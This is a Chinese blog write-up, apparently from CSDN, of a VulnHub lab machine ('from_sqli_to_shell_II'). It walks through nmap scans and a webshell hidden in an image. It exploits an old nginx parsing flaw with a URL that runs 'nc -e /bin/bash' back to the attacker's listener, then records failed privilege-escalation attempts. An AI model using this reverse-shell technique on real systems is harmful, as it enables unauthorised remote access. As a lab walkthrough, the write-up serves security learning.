vulnhub之from_sqli_to_shell_II_i386

已于 2023-04-15 11:51:03 修改
阅读量342 收藏 1
点赞数
文章标签: linux web安全 网络安全
于 2023-04-15 00:02:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/li1136594919/article/details/130164052
版权

一、主机发现

        sudo nmap -sn 192.168.62.0/24

        发现新增IP:192.168.62.141 。

二、getshell

1、端口扫描

①tcp端口扫描

# Nmap 7.93 scan initiated Thu Apr 13 23:25:37 2023 as: nmap --min-rate 10000 -p- -oA tcp_open_port 192.168.62.141
Nmap scan report for 192.168.62.141
Host is up (0.00051s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:08:94:3A (VMware)

# Nmap done at Thu Apr 13 23:26:17 2023 -- 1 IP address (1 host up) scanned in 40.08 seconds
        可以看到只有80端口是开放的。

②udp端口扫描

# Nmap 7.93 scan initiated Thu Apr 13 23:25:58 2023 as: nmap -sU --min-rate 10000 -p- -oA udp_open_port 192.168.62.141
Warning: 192.168.62.141 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.62.141
Host is up (0.00058s latency).
All 65535 scanned ports on 192.168.62.141 are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
MAC Address: 00:0C:29:08:94:3A (VMware)

# Nmap done at Thu Apr 13 23:27:23 2023 -- 1 IP address (1 host up) scanned in 85.63 seconds
        初步判断udp未有开放的端口,但是因为udp是不可靠连接,所以仅仅可以初步下判断,如果往后没有进攻向量,需要回来继续探测udp端口开放情况。

2、端口服务详细情况扫描

①服务类型,服务版本,操作系统探测

# Nmap 7.93 scan initiated Thu Apr 13 23:27:22 2023 as: nmap -sT -sV -O -p80 -oA open_port_service 192.168.62.141
Nmap scan report for 192.168.62.141
Host is up (0.0012s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 0.7.67
MAC Address: 00:0C:29:08:94:3A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.32
OS details: Linux 2.6.32
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Apr 13 23:27:44 2023 -- 1 IP address (1 host up) scanned in 22.34 seconds
             可以看到80端口跑的是nginx服务,版本0.7.67 ,操作系统是Linux,内核版本也探测出来为 2.6.32版本。

②nmap漏洞脚本扫描

        sudo nmap --script=vuln -p80 192.168.62.141   

 3、查看80端口情况

①到处点点看看,发现有三张图片

二话不说先全部下载到kali上,然后用exiftool查看是否有隐写,发现hacker.png有php的大码:

然后记得早期的nginx是有文件解析漏洞的,详细情况请自己搜索, kali进行监听sudo nc -lvp 9999,然后构建url

http://192.168.62.141/admin/uploads/hacker.png/x.php?c=nc%20-e%20/bin/bash%20192.168.62.129%209999

在浏览器执行,发现kali已经接收到反弹shell。

吐槽

        下载这台靶机的时候我也以为是通过sql注入getshell的,但是我执行固定流程:主机发现,端口扫描,获取图片,看到图片隐写,getshell只花了不到五分钟的时间。但是因为这台靶机制作时间很早且并未在机器上安装有python,所以交互性极差。

        在提权的过程中找到了连接数据库的用户名和密码:

        想着提权信息是不是在数据库中,想要进入数据库,由于交互性极差,只能凭借经验输入mysql -u pentesterlab -p 后输入密码,但是压根就进不去

        然后不死心,继续查找可以提权的信息,然后发现mysql的root信息

        但还是无法进入数据库,想着这两个密码会不会是某个用户的ssh密码,想要使用hydra进行爆破,想起使用nmap扫描端口开放情况的时候只有80端口是开放的,所以手工su - user吧。结果还是不行

         这时候还不死心,想着靶机名字提示的很明显,从web页面sql注入看能不能得到数据库的全部信息吧,然后兴致匆匆的想要进行sql注入,一把操作下来啥注入点也没发现

        以为是自己太菜了,得,去看一下别人的攻略(19条消息) from_sqli_to_shell靶机初体验_from sqli to shell_Leon.Luo的博客-CSDN博客

        直接复制sql注入语句

         啥变化也没有。。。

 

 

 

 

 

         最后想到这个机器这么老,直接内核提权吧 

,44304.c不成功。

 

未完待续。

小鲤鱼不想吐泡泡了
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
From SQL injection to shell II
cnbird's blog
06-20 1274
https://pentesterlab.com/from_sqli_to_shell_II.html
[Pentester Lab]from_sql_to_shell靶机
Re1_zf的博客
10-11 731
由此得到的这个账号密码可能就是上面那个登录页面的账号密码,而且这里sqlmap也直接给解密了密码的md5值。这个表是一个图片表,名称是一个herf,可以直接查看,后面的delete应该也是可以删除这张图片。测试一下注入点,页面的内容发生了改变,并且改编成的页面内容跟预期是一样的。首先找到一个传参的页面,记好测试前的页面的状态,然后开始测试。上传成功,检测机制不会涉及到内容,可能只是单纯的文件后缀检测。页面有些简单,但是众所周知,越简单的页面越恐怖,继续往下看。想办法上传一个可以以php格式解析的文件。
from_sqli_to_shell靶机初体验
qq_38390532的博客
07-21 1189
from_sqli_to_shell靶机的攻略
vulnhub笔记:from_sqli_to_shell
X
07-03 459
信息收集 端口扫描 # nmap -p- -sC -sV 192.168.111.141 -oA scans/allport Nmap scan report for 192.168.111.141 Host is up (0.00043s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.5p1 Debian 6+squeeze2 (protocol 2.
111
jackcily的博客
11-17 742
拓展:burp suite 攻击分为三步: 1.Fingerprinting 需要收集什么信息? web application and technology in use 什么手段? 在进行实验之前,首先使用nmap 扫描一下 victim 对外开放的端口 nmap 10.0.2.10 扫描结果如下: Starting Nmap 7.70 ( https://nmap.org ) at 2018...
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(一)Tr0ll
hyjcking的博客
11-20 2053
超级详细的步骤,希望可以为你解决这台靶机提供思路 说实话这个靶机不算难,但是却能比较好的巩固自己的基础知识,期间也遇到了自己不太懂的知识,会做和做的快是有区别的,在渗透这条路上还是任重而道远呐,继续加油
SQLi Dumper v.8.3_sqli_
09-30
SQLi Dumper v.8.3_sqli_ 是一个专门针对SQL注入漏洞的渗透测试工具,主要用于检测和利用SQL注入漏洞。SQL注入是一种常见的网络安全威胁,攻击者通过在Web应用程序的输入字段中插入恶意SQL代码,以获取未经授权的...
Vega_sqli_源码
10-04
sqli tool for searching vulnarabiliti for your website
Dedecms_20150618_member_sqli (2).py
10-05
dedecms5.7sp1后台(要能够注册member的vip账户后台才可以)存在sql延时注入exp,用火狐得到账户登录的cookie替换,然后Python2.7跑脚本,from乌云雨神 http://www.hekaiyu.cn/hacker/3060.html
arm_linux_sqlite.rar_compiler for linux_cross compile_linux sqli
09-22
Compile SQLite using the cross-compiler such as arm-...first, get sqlite-3.3.6.tar.gz from www.sqlite.org unzip it, #tar -zxvf sqlite-3.3.6.tar.gz change into the sqlite-3.3.6 directory cd sqlite-3.3.6
《Beyond_SQLi_Obfuscate_and_Bypass》.pdf
11-28
总的来说,《Beyond SQLi: Obfuscate and Bypass》是一篇深入解析SQL注入攻击策略的宝贵资源,它揭示了攻击者如何巧妙地规避安全措施,并为防御者提供了对抗这些攻击的思路和实践建议。对于网络安全专业人士来说,...
vulnhub之metasploitable2
li1136594919的博客
06-11 378
②利用漏洞库搜索vsftpd 2.3,发现有metasploit的EXP,直接上msfconsole,一会就成了。①ftp anonymous用户无密码登录,未发现任何 有用信息。
vulnhub 之pylington
li1136594919的博客
09-03 207
发现其功能是往文件中追加内容,其限制规则的逻辑是判断白粉目录是否以/srv/backups开头,因此我们可以使用../绕过限制,往/etc/passwd(修改passwd,shadow,sudoers等配置文件都行)加入root用户xiaoliyu。继续进行敏感信息枚举,在/home/py/secret_stuff/下发现root属主的suid文件backup和源码backup.cc文件,阅读源码。访问/login目录,使用刚刚获取到的凭据进行登录,成功登陆后显示以下画面。成功切换到py用户。
HACKTHEBOX通关笔记——wifinetic靶机(已退役)
最新发布
xuandaoren的博客
12-27 615
在employees_wellness.pdf里面看到all_employees@wifinetic.htb和samantha.wood93@wifinetic.htb,简单看下内容一份人力资源经理发送的邮件,推出了员工健康计划。ProjectOpenWRT.pdf和employees_wellness.pdf差不多,存在两个邮箱management@wifinetic.htb和olivia.walker17@wifinetic.htb。通过扫描结果可以看到ftp端口存在几个文件,看看有什么信息。
HTB靶场系列 Windows靶机 Blue靶机
m0_57221101的博客
01-26 1423
ms17-010漏洞,也就是广为人知的永恒之蓝,非常简单的一个靶机,因为几乎不用提权,ms17-010漏洞使用成功获取的就是system级别的权限 勘探 常规操作 先用nmap扫 nmap -p- --min-rate 10000 -oA scans/nmap-alltcp 10.10.10.40 Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-03 21:00 EDT Warning: 10.10.10.40 giving up on por
Hack the box: Bastion
neal1991的专栏
10-10 1268
介绍目标:10.10.10.134 (Windows)Kali:10.10.16.65In conclusion, Bastion is not a medium box...
打靶机信息收集四部曲之自动bash脚本
li1136594919的博客
04-16 139
后续有考虑对脚本进行拆分,让每个任务单独一个脚本,然后用一个总的shell去执行这些任务脚本,既能压缩时间,提高效率,往后有新的功能加进来时只需要再写一个脚本就行了。平时打靶机时,每次都要进行开放端口扫描,开放端口服务扫描,开放端口漏洞扫描,web目录爆破,我这个人比较懒,想着能不能写个自动脚本,每次只需要输入ip和保存信息的目录就行了,于是花了三四个小时写出这个个人版shell脚本。还有一种情况,那就是80和8080两个端口都开放且都是http服务,这里只扫描了一个端口(有可能一个也扫不到直接报错?
Web安全攻防 渗透测试实战指南》学习笔记(3) -Nmap
白帽子续命指南
04-10 3021
如有侵权,请联系删除 INSTALL linux下安装 sudo apt install nmap windows网上有教程 基本介绍 nmap功能有一些,但是身为小白的我,能用到的也就是端口扫描,对目标主机的端口扫描 如果是扫Web应用,有一款漏扫工具叫AWVS,这个后边再介绍吧 基本使用 nmap [相关参数] [ip/域名] 具体例子,我们扫一下千峰教育的官网 nmap -T4 -A -...
宏景 get_org_tree-sqli
11-30
宏景 get_org_tree-sqli是一种SQL注入攻击。在宏景软件的get_org_tree函数中,存在着未经过滤或者验证的用户输入,导致攻击者可以通过构造恶意的SQL查询语句来对数据库进行未授权的访问和操作。 当应用程序没有正确地对用户输入进行过滤、转义或验证时,攻击者可以利用这个漏洞构造恶意的输入来执行SQL查询语句。攻击者可以注入SQL代码,修改数据库查询语句的逻辑,获取、删除或修改数据库中的数据,甚至完全控制数据库服务器。 为了防止宏景 get_org_tree-sqli攻击,开发人员应该始终遵循安全的编码实践。 1. 输入验证和过滤:应该对所有的用户输入进行验证和过滤,确保输入数据符合预期的格式和类型。可以使用合适的输入验证函数或正则表达式来实现。 2. 使用参数化查询或预处理语句:建议使用参数化查询或预处理语句来执行数据库查询操作,而不是直接拼接用户输入构成的查询语句。参数化查询可以防止SQL注入攻击。 3. 最小权限原则:数据库账户应该按照最小权限原则进行授权,避免给予不必要的权限。这样即使发生了SQL注入攻击,攻击者也只能执行有限的操作。 4. 错误信息处理:避免将详细的错误信息直接输出到用户界面上,这样可能会暴露敏感的数据库结构和错误详情,为攻击者提供攻击的线索。可以将错误信息记录在日志文件中,以便日后的安全审计和调查。 通过以上措施,开发人员可以提高应用程序的安全性,防止宏景 get_org_tree-sqli等SQL注入攻击对系统造成威胁。同时,定期对应用程序进行安全测试和漏洞扫描,及时修复和更新系统中发现的安全漏洞,保障系统安全运行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值